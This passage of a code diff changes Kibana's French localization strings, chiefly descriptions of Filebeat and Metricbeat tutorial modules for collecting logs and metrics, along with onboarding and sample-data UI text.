Il prend en charge la lecture des logs d'audit, de flux VPC et de pare-feu qui ont été exportés depuis Stackdriver dans un récepteur de rubriques Google Pub/Sub. [En savoir plus]({learnMoreLink}).", + "home.tutorials.gcpMetrics.longDescription": "Le module Metricbeat \"gcp\" récupère des indicateurs depuis Google Cloud Platform à l'aide de l'API de monitoring Stackdriver. [En savoir plus]({learnMoreLink}).", + "home.tutorials.golangMetrics.longDescription": "Le module Metricbeat \"{moduleName}\" récupère des indicateurs depuis une application Golang. [En savoir plus]({learnMoreLink}).", + "home.tutorials.gsuiteLogs.longDescription": "Il s'agit d'un module pour l'ingestion de données depuis les différentes API de rapports d'audit GSuite. [En savoir plus]({learnMoreLink}).", + "home.tutorials.haproxyLogs.longDescription": "Le module collecte et analyse les logs d'un processus (\"haproxy\") [En savoir plus]({learnMoreLink}).", + "home.tutorials.haproxyMetrics.longDescription": "Le module Metricbeat \"haproxy\" récupère des indicateurs depuis HAProxy. [En savoir plus]({learnMoreLink}).", + "home.tutorials.ibmmqLogs.longDescription": "Collectez des logs IBM MQ avec Filebeat. [En savoir plus]({learnMoreLink}).", + "home.tutorials.ibmmqMetrics.longDescription": "Le module Metricbeat \"ibmmq\" récupère des indicateurs depuis les instances IBM MQ. [En savoir plus]({learnMoreLink}).", + "home.tutorials.icingaLogs.longDescription": "Le module analyse le log principal et les logs de débogage et de démarrage d'[Icinga](https://www.icinga.com/products/icinga-2/). [En savoir plus]({learnMoreLink}).", + "home.tutorials.iisLogs.longDescription": "Le module Filebeat \"iis\" analyse les logs d'accès et d'erreurs créés par le serveur HTTP IIS. [En savoir plus]({learnMoreLink}).", + "home.tutorials.iisMetrics.longDescription": "Le module Metricbeat \"iis\" collecte les indicateurs du serveur IIS ainsi que des sites web et des pools d'applications en cours d'exécution. 
[En savoir plus]({learnMoreLink}).", + "home.tutorials.impervaLogs.longDescription": "Ce module permet de recevoir des logs Imperva SecureSphere par le biais de Syslog ou d'un fichier. [En savoir plus]({learnMoreLink}).", + "home.tutorials.infobloxLogs.longDescription": "Ce module permet de recevoir des logs Infoblox NIOS par le biais de Syslog ou d'un fichier. [En savoir plus]({learnMoreLink}).", + "home.tutorials.iptablesLogs.longDescription": "Il s'agit d'un module pour les logs iptables et ip6tables. Il analyse les logs reçus via le réseau par le biais de Syslog ou d’un fichier. En outre, il comprend le préfixe ajouté par certains pare-feux Ubiquiti qui contient le nom de l'ensemble de règles, le numéro de règle et l'action effectuée sur le trafic (autoriser/refuser). [En savoir plus]({learnMoreLink}).", + "home.tutorials.juniperLogs.longDescription": "Ce module permet de recevoir des logs Juniper JUNOS par le biais de Syslog ou d'un fichier. [En savoir plus]({learnMoreLink}).", + "home.tutorials.kafkaLogs.longDescription": "Le module Filebeat \"kafka\" analyse les logs créés par Kafka. [En savoir plus]({learnMoreLink}).", + "home.tutorials.kafkaMetrics.longDescription": "Le module Metricbeat \"kafka\" récupère des indicateurs depuis Kafka. [En savoir plus]({learnMoreLink}).", + "home.tutorials.kibanaLogs.longDescription": "Il s'agit du module Kibana. [En savoir plus]({learnMoreLink}).", + "home.tutorials.kibanaMetrics.longDescription": "Le module Metricbeat \"kibana\" récupère des indicateurs depuis Kibana. [En savoir plus]({learnMoreLink}).", + "home.tutorials.kubernetesMetrics.longDescription": "Le module Metricbeat \"kubernetes\" récupère des indicateurs depuis les API Kubernetes. [En savoir plus]({learnMoreLink}).", + "home.tutorials.logstashLogs.longDescription": "Le module analyse les logs standard et le log de requêtes lentes Logstash. Il prend en charge les formats texte brut et JSON. 
[En savoir plus]({learnMoreLink}).", + "home.tutorials.logstashMetrics.longDescription": "Le module Metricbeat \"{moduleName}\" récupère des indicateurs depuis un serveur Logstash. [En savoir plus]({learnMoreLink}).", + "home.tutorials.memcachedMetrics.longDescription": "Le module Metricbeat \"memcached\" récupère des indicateurs depuis Memcached. [En savoir plus]({learnMoreLink}).", + "home.tutorials.microsoftLogs.longDescription": "Collectez des alertes Microsoft Defender ATP pour les utiliser avec Elastic Security [En savoir plus]({learnMoreLink}).", + "home.tutorials.mispLogs.longDescription": "Il s'agit d'un module Filebeat pour la lecture des informations de Threat Intelligence depuis la plateforme MISP (https://www.circl.lu/doc/misp/). Il utilise l'entrée httpjson pour accéder à l'interface d'API REST MISP. [En savoir plus]({learnMoreLink}).", + "home.tutorials.mongodbLogs.longDescription": "Le module collecte et analyse les logs créés par [MongoDB](https://www.mongodb.com/). [En savoir plus]({learnMoreLink}).", + "home.tutorials.mongodbMetrics.longDescription": "Le module Metricbeat \"mongodb\" récupère des indicateurs depuis le serveur MongoDB. [En savoir plus]({learnMoreLink}).", + "home.tutorials.mssqlLogs.longDescription": "Le module analyse les logs d'erreurs créés par MSSQL. [En savoir plus]({learnMoreLink}).", + "home.tutorials.mssqlMetrics.longDescription": "Le module Metricbeat \"mssql\" récupère des indicateurs de monitoring, de logs et de performances depuis une instance Microsoft SQL Server. [En savoir plus]({learnMoreLink}).", + "home.tutorials.muninMetrics.longDescription": "Le module Metricbeat \"munin\" récupère des indicateurs depuis Munin. [En savoir plus]({learnMoreLink}).", + "home.tutorials.mysqlLogs.longDescription": "Le module Filebeat \"mysql\" analyse les logs d'erreurs et de requêtes lentes créés par MySQL. 
[En savoir plus]({learnMoreLink}).", + "home.tutorials.mysqlMetrics.longDescription": "Le module Metricbeat \"mysql\" récupère des indicateurs depuis le serveur MySQL. [En savoir plus]({learnMoreLink}).", + "home.tutorials.natsLogs.longDescription": "Le module Filebeat \"nats\" analyse les logs créés par NATS. [En savoir plus]({learnMoreLink}).", + "home.tutorials.natsMetrics.longDescription": "Le module Metricbeat \"nats\" récupère des indicateurs depuis NATS. [En savoir plus]({learnMoreLink}).", + "home.tutorials.netflowLogs.longDescription": "Ce module permet de recevoir des enregistrements de flux NetFlow et IPFIX via UDP. Cette entrée prend en charge les versions 1, 5, 6, 7, 8 et 9 de NetFlow ainsi qu'IPFIX. Pour les versions de NetFlow antérieures à la version 9, les champs sont automatiquement mappés vers NetFlow v9. [En savoir plus]({learnMoreLink})", + "home.tutorials.netscoutLogs.longDescription": "Ce module permet de recevoir des logs Arbor Peakflow SP par le biais de Syslog ou d'un fichier. [En savoir plus]({learnMoreLink}).", + "home.tutorials.nginxLogs.longDescription": "Le module Filebeat \"nginx\" analyse les logs d'accès et d'erreurs créés par le serveur HTTP Nginx. [En savoir plus]({learnMoreLink}).", + "home.tutorials.nginxMetrics.longDescription": "Le module Metricbeat \"nginx\" récupère des indicateurs depuis le serveur HTTP Nginx. Le module récupère les données de statut du serveur depuis la page web générée par {statusModuleLink}, qui doit être activé dans votre installation Nginx. [En savoir plus]({learnMoreLink}).", + "home.tutorials.o365Logs.longDescription": "Il s'agit d'un module pour les logs Office 365 reçus via l'un des points de terminaison d'API Office 365. Actuellement, il prend en charge les actions et les événements utilisateur, administrateur, système et de politique depuis les logs d’activité Office 365 et Azure AD exposés par l'API d’activité de gestion Office 365. 
[En savoir plus]({learnMoreLink}).", + "home.tutorials.oktaLogs.longDescription": "Le module Okta collecte les événements de l'[API Okta](https://developer.okta.com/docs/reference/). Plus précisément, il prend en charge la lecture depuis l'[API de log système Okta](https://developer.okta.com/docs/reference/api/system-log/). [En savoir plus]({learnMoreLink}).", + "home.tutorials.openmetricsMetrics.longDescription": "Le module Metricbeat \"openmetrics\" récupère des indicateurs depuis un point de terminaison fournissant des indicateurs au format OpenMetrics. [En savoir plus]({learnMoreLink}).", + "home.tutorials.oracleMetrics.longDescription": "Le module Metricbeat \"{moduleName}\" récupère des indicateurs depuis un serveur Oracle. [En savoir plus]({learnMoreLink}).", + "home.tutorials.osqueryLogs.longDescription": "Le module collecte et décode les logs de résultats écrits par [osqueryd](https://osquery.readthedocs.io/en/latest/introduction/using-osqueryd/) au format JSON. Pour configurer \"osqueryd\", suivez les instructions d'installation d'osquery pour votre système d'exploitation et configurez le pilote de logging \"filesystem\" (celui par défaut). Assurez-vous que les horodatages UTC sont activés. [En savoir plus]({learnMoreLink}).", + "home.tutorials.panwLogs.longDescription": "Il s'agit d'un module pour les logs de monitoring des pare-feux Palo Alto Networks PAN-OS reçus par le biais de Syslog ou lus depuis un fichier. Actuellement, il prend en charge les messages de type Trafic et Menaces. [En savoir plus]({learnMoreLink}).", + "home.tutorials.phpFpmMetrics.longDescription": "Le module Metricbeat \"php_fpm\" récupère des indicateurs depuis le serveur PHP-FPM. [En savoir plus]({learnMoreLink}).", + "home.tutorials.postgresqlLogs.longDescription": "Le module Filebeat \"postgresql\" analyse les logs d'erreurs et de requêtes lentes créés par PostgreSQL. 
[En savoir plus]({learnMoreLink}).", + "home.tutorials.postgresqlMetrics.longDescription": "Le module Metricbeat \"postgresql\" récupère des indicateurs depuis le serveur PostgreSQL. [En savoir plus]({learnMoreLink}).", + "home.tutorials.prometheusMetrics.longDescription": "Le module Metricbeat \"{moduleName}\" récupère des indicateurs depuis le point de terminaison Prometheus. [En savoir plus]({learnMoreLink}).", + "home.tutorials.rabbitmqLogs.longDescription": "Ce module permet d'analyser les [fichiers log RabbitMQ](https://www.rabbitmq.com/logging.html). [En savoir plus]({learnMoreLink}).", + "home.tutorials.rabbitmqMetrics.longDescription": "Le module Metricbeat \"rabbitmq\" récupère des indicateurs depuis le serveur RabbitMQ. [En savoir plus]({learnMoreLink}).", + "home.tutorials.radwareLogs.longDescription": "Ce module permet de recevoir des logs Radware DefensePro par le biais de Syslog ou d'un fichier. [En savoir plus]({learnMoreLink}).", + "home.tutorials.redisenterpriseMetrics.longDescription": "Le module Metricbeat \"redisenterprise\" récupère des indicateurs depuis le serveur Redis Enterprise. [En savoir plus]({learnMoreLink}).", + "home.tutorials.redisLogs.longDescription": "Le module Filebeat \"redis\" analyse les logs d'erreurs et de requêtes lentes créés par Redis. Pour que Redis écrive des logs d'erreurs, assurez-vous que l'option \"logfile\" est définie sur \"redis-server.log\" dans le fichier de configuration Redis. Les logs de requêtes lentes sont lus directement depuis Redis via la commande \"SLOWLOG\". Pour que Redis enregistre des logs de requêtes lentes, assurez-vous que l'option \"slowlog-log-slower-than\" est activée. Notez que l'ensemble de fichiers \"slowlog\" est expérimental. [En savoir plus]({learnMoreLink}).", + "home.tutorials.redisMetrics.longDescription": "Le module Metricbeat \"redis\" récupère des indicateurs depuis le serveur Redis. 
[En savoir plus]({learnMoreLink}).", + "home.tutorials.santaLogs.longDescription": "Le module collecte et analyse les logs de [Google Santa](https://github.com/google/santa), un outil de sécurité pour macOS qui monitore les exécutions de processus et est capable de mettre en liste noire/blanche des fichiers binaires. [En savoir plus]({learnMoreLink}).", + "home.tutorials.sonicwallLogs.longDescription": "Ce module permet de recevoir des logs Sonicwall FW par le biais de Syslog ou d'un fichier. [En savoir plus]({learnMoreLink}).", + "home.tutorials.sophosLogs.longDescription": "Il s'agit d'un module pour les produits Sophos. Actuellement, il prend en charge les logs XG SFOS envoyés au format Syslog. [En savoir plus]({learnMoreLink}).", + "home.tutorials.squidLogs.longDescription": "Ce module permet de recevoir des logs Squid par le biais de Syslog ou d'un fichier. [En savoir plus]({learnMoreLink}).", + "home.tutorials.stanMetrics.longDescription": "Le module Metricbeat \"stan\" récupère des indicateurs depuis STAN. [En savoir plus]({learnMoreLink}).", + "home.tutorials.statsdMetrics.longDescription": "Le module Metricbeat \"statsd\" récupère des indicateurs depuis statsd. [En savoir plus]({learnMoreLink}).", + "home.tutorials.suricataLogs.longDescription": "Il s'agit d'un module pour le log IDS/IPS/NSM Suricata. Il analyse les logs qui sont au [format JSON Suricata Eve](https://suricata.readthedocs.io/en/latest/output/eve/eve-json-format.html). [En savoir plus]({learnMoreLink}).", + "home.tutorials.systemLogs.longDescription": "Le module collecte et analyse les logs créés par le service de logging système des distributions basées sur Unix/Linux communes. [En savoir plus]({learnMoreLink}).", + "home.tutorials.systemMetrics.longDescription": "Le module Metricbeat \"system\" collecte des statistiques relatives au CPU, à la mémoire, au réseau et au disque depuis l'hôte. 
Il collecte des statistiques au niveau du système et des statistiques par processus et système de fichiers. [En savoir plus]({learnMoreLink}).", + "home.tutorials.tomcatLogs.longDescription": "Ce module permet de recevoir des logs Apache Tomcat par le biais de Syslog ou d'un fichier. [En savoir plus]({learnMoreLink}).", + "home.tutorials.traefikLogs.longDescription": "Le module analyse les logs d'accès créés par [Traefik](https://traefik.io/). [En savoir plus]({learnMoreLink}).", + "home.tutorials.traefikMetrics.longDescription": "Le module Metricbeat \"traefik\" récupère des indicateurs depuis Traefik. [En savoir plus]({learnMoreLink}).", + "home.tutorials.uptimeMonitors.longDescription": "Monitorez la disponibilité des services grâce à une détection active. À partir d'une liste d'URL, Heartbeat pose cette question toute simple : Êtes-vous actif ? [En savoir plus]({learnMoreLink}).", + "home.tutorials.uwsgiMetrics.longDescription": "Le module Metricbeat \"uwsgi\" récupère des indicateurs depuis le serveur uWSGI. [En savoir plus]({learnMoreLink}).", + "home.tutorials.vsphereMetrics.longDescription": "Le module Metricbeat \"vsphere\" récupère des indicateurs depuis un cluster vSphere. [En savoir plus]({learnMoreLink}).", + "home.tutorials.windowsEventLogs.longDescription": "Utilisez Winlogbeat pour collecter des logs depuis le log des événements Windows. [En savoir plus]({learnMoreLink}).", + "home.tutorials.windowsMetrics.longDescription": "Le module Metricbeat \"windows\" récupère des indicateurs depuis Windows. [En savoir plus]({learnMoreLink}).", + "home.tutorials.zeekLogs.longDescription": "Il s'agit d'un module pour Zeek, anciennement appelé Bro. Il analyse les logs qui sont au [format JSON Zeek](https://www.zeek.org/manual/release/logs/index.html). [En savoir plus]({learnMoreLink}).", + "home.tutorials.zookeeperMetrics.longDescription": "Le module Metricbeat \"{moduleName}\" récupère des indicateurs depuis un serveur Zookeeper. 
[En savoir plus]({learnMoreLink}).", + "home.tutorials.zscalerLogs.longDescription": "Ce module permet de recevoir des logs Zscaler NSS par le biais de Syslog ou d'un fichier. [En savoir plus]({learnMoreLink}).", "home.addData.addDataButtonLabel": "Ajouter des intégrations", "home.addData.sampleDataButtonLabel": "Utiliser un exemple de données", "home.addData.sectionTitle": "Ajoutez des intégrations pour commencer", "home.addData.text": "Vous avez plusieurs options pour commencer à exploiter vos données. Vous pouvez collecter des données à partir d'une application ou d'un service, ou bien charger un fichier. Et si vous n'êtes pas encore prêt à utiliser vos propres données, utilisez notre exemple d’ensemble de données.", "home.addData.uploadFileButtonLabel": "Charger un fichier", + "home.breadcrumbs.gettingStartedTitle": "Commencer", "home.breadcrumbs.homeTitle": "Accueil", "home.breadcrumbs.integrationsAppTitle": "Intégrations", "home.exploreButtonLabel": "Explorer par moi-même", "home.exploreYourDataDescription": "Une fois toutes les étapes terminées, vous êtes prêt à explorer vos données.", + "home.guidedOnboarding.gettingStarted.observability.cardDescription": "Obtenez une observabilité de bout en bout de vos environnements en consolidant vos journaux, vos indicateurs et vos traces.", + "home.guidedOnboarding.gettingStarted.observability.cardTitle": "Monitorer mes environnements", + "home.guidedOnboarding.gettingStarted.observability.iconName": "Logo Observability", + "home.guidedOnboarding.gettingStarted.search.cardDescription": "Créez une expérience de recherche fine pour vos sites web, vos applications, votre contenu workplace, etc.", + "home.guidedOnboarding.gettingStarted.search.cardTitle": "Rechercher dans mes données", + "home.guidedOnboarding.gettingStarted.search.iconName": "Logo Entreprise Search", + "home.guidedOnboarding.gettingStarted.security.cardDescription": "Protégez votre environnement contre les menaces en unifiant SIEM, la sécurité des points 
de terminaison et la sécurité cloud en un seul endroit.", + "home.guidedOnboarding.gettingStarted.security.cardTitle": "Protéger mon environnement", + "home.guidedOnboarding.gettingStarted.security.iconName": "Logo Security", + "home.guidedOnboarding.gettingStarted.skip.buttonLabel": "Non merci, je vais explorer par moi-même.", + "home.guidedOnboarding.gettingStarted.useCaseSelectionSubtitle": "Sélectionnez un point de départ pour une visite rapide de la façon dont Elastic peut vous aider à faire encore plus avec vos données.", + "home.guidedOnboarding.gettingStarted.useCaseSelectionTitle": "Par quoi voulez-vous commencer ?", "home.header.title": "Bienvenue chez vous", "home.letsStartDescription": "Ajoutez des données à votre cluster depuis n’importe quelle source, puis analysez-les et visualisez-les en temps réel. Utilisez nos solutions pour définir des recherches, observer votre écosystème et vous protéger contre les menaces de sécurité.", "home.letsStartTitle": "Ajoutez des intégrations pour commencer", - "home.loadTutorials.requestFailedErrorMessage": "Échec de la requête avec le code de statut : {status}", "home.loadTutorials.unableToLoadErrorMessage": "Impossible de charger les tutoriels", "home.manageData.devToolsButtonLabel": "Outils de développement", "home.manageData.sectionTitle": "Gestion", 
@@ -3837,7 +3176,7 @@ "home.sampleData.flightsSpec.departuresCountMapTitle": "[Vols] Mappage du nombre de départs", "home.sampleData.flightsSpec.destinationWeatherTitle": "[Vols] Météo à la destination", "home.sampleData.flightsSpec.flightLogTitle": "[Vols] Journal de vol", - "home.sampleData.flightsSpec.globalFlightDashboardDescription": "Analyser des données aéroportuaires factices pour ES-Air, Logstash Airways, Kibana Airlines et JetBeats", + "home.sampleData.flightsSpec.globalFlightDashboardDescription": "Analyser des données aéroportuaires factices pour ES-Air, Logstash Airways, Kibana Airlines et JetBeats", "home.sampleData.flightsSpec.globalFlightDashboardTitle": "[Vols] Tableau de bord des vols internationaux", "home.sampleData.flightsSpecDescription": "Exemple de données, de visualisations et de tableaux de bord pour le monitoring des itinéraires de vol.", "home.sampleData.flightsSpecTitle": "Exemple de données aéroportuaires", @@ -3846,7 +3185,7 @@ "home.sampleData.logsSpec.goalsTitle": "[Logs] Objectifs", "home.sampleData.logsSpec.heatmapTitle": "[Logs] Carte thermique de destination unique", "home.sampleData.logsSpec.hostVisitsBytesTableTitle": "[Logs] Tableau des hôtes, visites et octets", - "home.sampleData.logsSpec.responseCodesOverTimeTitle": "[Logs] Codes de réponse sur la durée + annotations", + "home.sampleData.logsSpec.responseCodesOverTimeTitle": "[Logs] Codes de réponse sur la durée + annotations", "home.sampleData.logsSpec.sourceAndDestinationSankeyChartTitle": "[Logs] Diagramme de Sankey de système d'exploitation source et destination", "home.sampleData.logsSpec.visitorsMapTitle": "[Logs] Mappage des visiteurs", "home.sampleData.logsSpec.webTrafficDescription": "Analyser des données de log factices relatives au trafic Internet du site d'Elastic", 
@@ -3855,14 +3194,13 @@ "home.sampleData.logsSpecTitle": "Exemple de logs Internet", "home.solutionsSection.sectionTitle": "Choisir votre solution", "home.tryButtonLabel": "Ajouter des intégrations", - "home.tutorial.addDataToKibanaDescription": "En plus d'ajouter {integrationsLink}, vous pouvez essayer l'exemple de données ou charger vos propres données.", "home.tutorial.addDataToKibanaDescription.integrations": "intégrations", "home.tutorial.addDataToKibanaTitle": "Autres façons d'ajouter des données", "home.tutorial.backToDirectory": "Retour au répertoire", "home.tutorial.card.sampleDataDescription": "Commencez votre exploration de Kibana avec ces ensembles de données \"en un clic\".", "home.tutorial.card.sampleDataTitle": "Exemple de données", - "home.tutorial.elasticCloudButtonLabel": "Elastic Cloud", - "home.tutorial.instruction_variant.fleet": "Elastic APM dans Fleet", + "home.tutorial.elasticCloudButtonLabel": "Elastic Cloud", + "home.tutorial.instruction_variant.fleet": "Elastic APM dans Fleet", "home.tutorial.instructionSet.checkStatusButtonLabel": "Vérifier le statut", "home.tutorial.instructionSet.customizeLabel": "Personnaliser les extraits de code", "home.tutorial.instructionSet.noDataLabel": "Aucune donnée trouvée", 
@@ -3873,130 +3211,85 @@ "home.tutorial.introduction.browseAllIntegrationsButton": "Parcourir toutes les intégrations", "home.tutorial.introduction.imageAltDescription": "Capture d'écran du tableau de bord principal.", "home.tutorial.introduction.viewButtonLabel": "Consulter les champs exportés", - "home.tutorial.noTutorialLabel": "Tutoriel {tutorialId} introuvable", - "home.tutorial.savedObject.addedLabel": "{savedObjectsLength} objets enregistrés ont bien été ajoutés.", "home.tutorial.savedObject.confirmButtonLabel": "Confirmer l'écrasement", "home.tutorial.savedObject.defaultButtonLabel": "Charger des objets Kibana", "home.tutorial.savedObject.installLabel": "Importe un modèle d'indexation, des visualisations et des tableaux de bord prédéfinis.", - "home.tutorial.savedObject.installStatusLabel": "{overwriteErrorsLength} objets sur {savedObjectsLength} existent déjà. Cliquez sur \"Confirmer l'écrasement\" pour importer et écraser les objets existants. Toute modification apportée aux objets sera perdue.", "home.tutorial.savedObject.loadTitle": "Charger des objets Kibana", - "home.tutorial.savedObject.requestFailedErrorMessage": "Échec de la requête. Erreur : {message}.", - "home.tutorial.savedObject.unableToAddErrorMessage": "Impossible d'ajouter {errorsLength} objets Kibana sur {savedObjectsLength} . 
Erreur : {errorMessage}.", "home.tutorial.selectionLegend": "Type de déploiement", "home.tutorial.selfManagedButtonLabel": "Autogéré", "home.tutorial.tabs.sampleDataTitle": "Exemple de données", - "home.tutorial.unexpectedStatusCheckStateErrorDescription": "État de vérification du statut {statusCheckState} inattendu", - "home.tutorial.unhandledInstructionTypeErrorDescription": "Type d'instructions {visibleInstructions} non pris en charge", "home.tutorialDirectory.featureCatalogueDescription": "Importez des données à partir d'applications et de services populaires.", "home.tutorialDirectory.featureCatalogueTitle": "Ajouter des données", "home.tutorials.activemqLogs.artifacts.dashboards.linkLabel": "Événements d'audit ActiveMQ", - "home.tutorials.activemqLogs.longDescription": "Collectez les logs ActiveMQ avec Filebeat. [En savoir plus]({learnMoreLink}).", "home.tutorials.activemqLogs.nameTitle": "Logs ActiveMQ", "home.tutorials.activemqLogs.shortDescription": "Collectez et analysez les logs à partir des instances ActiveMQ avec Filebeat.", "home.tutorials.activemqMetrics.artifacts.application.label": "Découverte", - "home.tutorials.activemqMetrics.longDescription": "Le module Metricbeat ''activemq'' récupère les indicateurs depuis les instances ActiveMQ. [En savoir plus]({learnMoreLink}).", "home.tutorials.activemqMetrics.nameTitle": "Indicateurs ActiveMQ", "home.tutorials.activemqMetrics.shortDescription": "Collectez les indicateurs à partir des instances ActiveMQ avec Metricbeat.", "home.tutorials.aerospikeMetrics.artifacts.application.label": "Découverte", - "home.tutorials.aerospikeMetrics.longDescription": "Le module Metricbeat ''aerospike'' récupère les indicateurs d'Aerospike. 
[En savoir plus]({learnMoreLink}).", "home.tutorials.aerospikeMetrics.nameTitle": "Indicateurs Aerospike", "home.tutorials.aerospikeMetrics.shortDescription": "Collectez les indicateurs à partir des serveurs Aerospike avec Metricbeat.", "home.tutorials.apacheLogs.artifacts.dashboards.linkLabel": "Tableau de bord des logs Apache", - "home.tutorials.apacheLogs.longDescription": "Le module Filebeat ''apache'' analyse les logs d'accès et d'erreurs créés par le serveur HTTP Apache. [En savoir plus]({learnMoreLink}).", "home.tutorials.apacheLogs.nameTitle": "Logs de serveur HTTP Apache", "home.tutorials.apacheLogs.shortDescription": "Collectez et analysez les logs à partir des serveurs HTTP Apache avec Filebeat.", - "home.tutorials.apacheMetrics.artifacts.dashboards.linkLabel": "Tableau de bord des indicateurs Apache", - "home.tutorials.apacheMetrics.longDescription": "Le module Metricbeat ''apache'' récupère les indicateurs depuis le serveur HTTP Apache 2. [En savoir plus]({learnMoreLink}).", + "home.tutorials.apacheMetrics.artifacts.dashboards.linkLabel": "Tableau de bord des indicateurs Apache", "home.tutorials.apacheMetrics.nameTitle": "Indicateurs de serveur HTTP Apache", "home.tutorials.apacheMetrics.shortDescription": "Collectez les indicateurs à partir des serveurs HTTP Apache avec Metricbeat.", "home.tutorials.auditbeat.artifacts.dashboards.linkLabel": "Application Security", - "home.tutorials.auditbeat.longDescription": "Utilisez Auditbeat pour collecter les données d'audit de vos hôtes. Ces données incluent les processus, utilisateurs, connexions, informations de socket, accès aux fichiers et bien plus encore. 
[En savoir plus]({learnMoreLink}).", "home.tutorials.auditbeat.nameTitle": "Événements Auditbeat", "home.tutorials.auditbeat.shortDescription": "Collectez les événements à partir de vos serveurs avec Auditbeat.", "home.tutorials.auditdLogs.artifacts.dashboards.linkLabel": "Événements d'audit", - "home.tutorials.auditdLogs.longDescription": "Le module collecte et analyse les logs du démon d'audit (''auditd'') [En savoir plus]({learnMoreLink}).", "home.tutorials.auditdLogs.nameTitle": "Logs auditd", "home.tutorials.auditdLogs.shortDescription": "Collectez et analysez les logs à partir du démon d'audit Linux avec Filebeat.", - "home.tutorials.awsLogs.artifacts.dashboards.linkLabel": "Tableau de bord du log d'accès au serveur AWS S3", - "home.tutorials.awsLogs.longDescription": "Collectez des logs AWS en les exportant vers un compartiment S3 configuré avec la notification SQS [En savoir plus]({learnMoreLink}).", - "home.tutorials.awsLogs.nameTitle": "Logs AWS S3", + "home.tutorials.awsLogs.artifacts.dashboards.linkLabel": "Tableau de bord du log d'accès au serveur AWS S3", + "home.tutorials.awsLogs.nameTitle": "Logs AWS S3", "home.tutorials.awsLogs.shortDescription": "Collectez et analysez les logs à partir des compartiments S3 AWS avec Filebeat.", - "home.tutorials.awsMetrics.artifacts.dashboards.linkLabel": "Tableau de bord des indicateurs AWS", - "home.tutorials.awsMetrics.longDescription": "Le module Metricbeat ''aws'' récupère les indicateurs depuis les API AWS et Cloudwatch. 
[En savoir plus]({learnMoreLink}).", - "home.tutorials.awsMetrics.nameTitle": "Indicateurs AWS", - "home.tutorials.awsMetrics.shortDescription": "Collectez les indicateurs pour les instances EC2 depuis les API AWS et Cloudwatch avec Metricbeat.", + "home.tutorials.awsMetrics.artifacts.dashboards.linkLabel": "Tableau de bord des indicateurs AWS", + "home.tutorials.awsMetrics.nameTitle": "Indicateurs AWS", + "home.tutorials.awsMetrics.shortDescription": "Collectez les indicateurs pour les instances EC2 depuis les API AWS et Cloudwatch avec Metricbeat.", "home.tutorials.azureLogs.artifacts.dashboards.linkLabel": "Tableau de bord des logs Azure", - "home.tutorials.azureLogs.longDescription": "Le module Filebeat ''azure'' collecte les logs d’activité et d’audit Azure. [Learn more]({learnMoreLink}).", "home.tutorials.azureLogs.nameTitle": "Logs Azure", "home.tutorials.azureLogs.shortDescription": "Collectez et analysez les logs à partir d'Azure avec Filebeat.", - "home.tutorials.azureMetrics.artifacts.dashboards.linkLabel": "Tableau de bord des indicateurs Azure", - "home.tutorials.azureMetrics.longDescription": "Le module Metricbeat ''azure'' récupère les indicateurs de monitoring Azure. [En savoir plus]({learnMoreLink}).", - "home.tutorials.azureMetrics.nameTitle": "Indicateurs Azure", + "home.tutorials.azureMetrics.artifacts.dashboards.linkLabel": "Tableau de bord des indicateurs Azure", + "home.tutorials.azureMetrics.nameTitle": "Indicateurs Azure", "home.tutorials.azureMetrics.shortDescription": "Collectez les indicateurs à partir d'Azure avec Metricbeat.", "home.tutorials.barracudaLogs.artifacts.dashboards.linkLabel": "Application Security", - "home.tutorials.barracudaLogs.longDescription": "Ce module permet de recevoir les logs Barracuda Web Application Firewall par le biais de Syslog ou d’un fichier. 
[Learn more]({learnMoreLink}).", "home.tutorials.barracudaLogs.nameTitle": "Logs Barracuda", "home.tutorials.barracudaLogs.shortDescription": "Collectez et analysez les logs à partir de Barracuda Web Application Firewall avec Filebeat.", "home.tutorials.bluecoatLogs.artifacts.dashboards.linkLabel": "Application Security", - "home.tutorials.bluecoatLogs.longDescription": "Ce module permet de recevoir les logs Blue Coat Director par le biais de Syslog ou d’un fichier. [Learn more]({learnMoreLink}).", - "home.tutorials.bluecoatLogs.nameTitle": "Logs Blue Coat Director", + "home.tutorials.bluecoatLogs.nameTitle": "Logs Blue Coat Director", "home.tutorials.bluecoatLogs.shortDescription": "Collectez et analysez les logs à partir de Blue Coat Director avec Filebeat.", - "home.tutorials.cefLogs.artifacts.dashboards.linkLabel": "Tableau de bord d'aperçu du réseau CEF", - "home.tutorials.cefLogs.longDescription": "Ce module permet de recevoir des données Common Event Format (CEF) par le biais de Syslog. Lorsque des messages sont reçus par le biais du protocole Syslog, l'entrée Syslog analyse l'en-tête et définit la valeur d'horodatage. Puis le processeur est appliqué pour analyser les données CEF. Les données décodées sont alors écrites dans un champ objet ''cef''. Enfin, tous les champs Elastic Common Schema (ECS) ayant des correspondances CEF sont renseignés. [En savoir plus]({learnMoreLink}).", - "home.tutorials.cefLogs.nameTitle": "Logs CEF", + "home.tutorials.cefLogs.artifacts.dashboards.linkLabel": "Tableau de bord d'aperçu du réseau CEF", + "home.tutorials.cefLogs.nameTitle": "Logs CEF", "home.tutorials.cefLogs.shortDescription": "Collectez et analysez les logs à partir de Common Event Format (CEF) avec Filebeat.", "home.tutorials.cephMetrics.artifacts.application.label": "Découverte", - "home.tutorials.cephMetrics.longDescription": "Le module Metricbeat ''ceph'' récupère les indicateurs depuis Ceph. 
[En savoir plus]({learnMoreLink}).", - "home.tutorials.cephMetrics.nameTitle": "Indicateurs Ceph", + "home.tutorials.cephMetrics.nameTitle": "Indicateurs Ceph", "home.tutorials.cephMetrics.shortDescription": "Collectez les indicateurs à partir des serveurs Ceph avec Metricbeat.", "home.tutorials.checkpointLogs.artifacts.dashboards.linkLabel": "Application Security", - "home.tutorials.checkpointLogs.longDescription": "Il s'agit d'un module pour les logs de pare-feu Check Point. Il prend en charge les logs de l’exportateur de journaux au format Syslog. [Learn more]({learnMoreLink}).", - "home.tutorials.checkpointLogs.nameTitle": "Logs Check Point", + "home.tutorials.checkpointLogs.nameTitle": "Logs Check Point", "home.tutorials.checkpointLogs.shortDescription": "Collectez et analysez les logs à partir des pare-feu Check Point avec Filebeat.", - "home.tutorials.ciscoLogs.artifacts.dashboards.linkLabel": "Tableau de bord de pare-feu ASA", - "home.tutorials.ciscoLogs.longDescription": "Il s'agit d'un module pour les logs de dispositifs réseau Cisco (ASA, FTD, IOS, Nexus). Il inclut les ensembles de fichiers suivants pour la réception des logs par le biais de Syslog ou d'un ficher. [En savoir plus]({learnMoreLink}).", + "home.tutorials.ciscoLogs.artifacts.dashboards.linkLabel": "Tableau de bord de pare-feu ASA", "home.tutorials.ciscoLogs.nameTitle": "Logs Cisco", "home.tutorials.ciscoLogs.shortDescription": "Collectez et analysez les logs à partir des périphériques réseau 